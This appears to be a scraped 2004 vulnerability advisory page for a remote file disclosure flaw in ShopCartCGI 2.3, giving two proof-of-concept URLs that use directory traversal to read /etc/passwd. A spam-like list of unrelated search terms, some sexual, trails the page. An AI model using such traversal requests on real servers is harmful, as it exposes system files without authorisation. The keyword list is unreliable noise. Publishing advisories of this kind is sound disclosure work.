about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ShopCartCGI Remote File Disclosure Vulnerability


Title ShopCartCGI Remote File Disclosure Vulnerability
Published 2004-02-16-12:00AM
Updated 2004-09-18-05:22PM
Class Input Validation Error
CVE   CAN-2004-0293
Remote  Yes
Local  No
Credit  Disclosure of this issue is credited to G00db0y.
Vulnerable  ShopCartCGI ShopCartCGI 2.3
Not Vulnerable  ShopCartCGI ShopCartCGI 2.4
Code   No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd

http://www.example.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 12:22:06 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
2.4 exploi free clip Hunkaray maxcpm.inf www.876666 200 /compo www.2568cn xxnx.com Sabdrimer messenger Pamala and aduktsex.c www.cfsupe Tamil sex 5269wz.cn smf 1.1. nude seen Burning Bo PHP Advanc www.sarahb people hav news.ltdts /search/ex 200 /compo www.sexy+t hornywifes china sex freeworlds sexyfoot mingrenzhi sex all haro&a open SSH www.2568cn seximovies www.sexyim paki big b phpraider news for c wwwusa.com www.j131.c lo674l sexy fhoto maxcpm.inf video sexy www.hotind Bakyboy mambo Remo Z600326 girl photo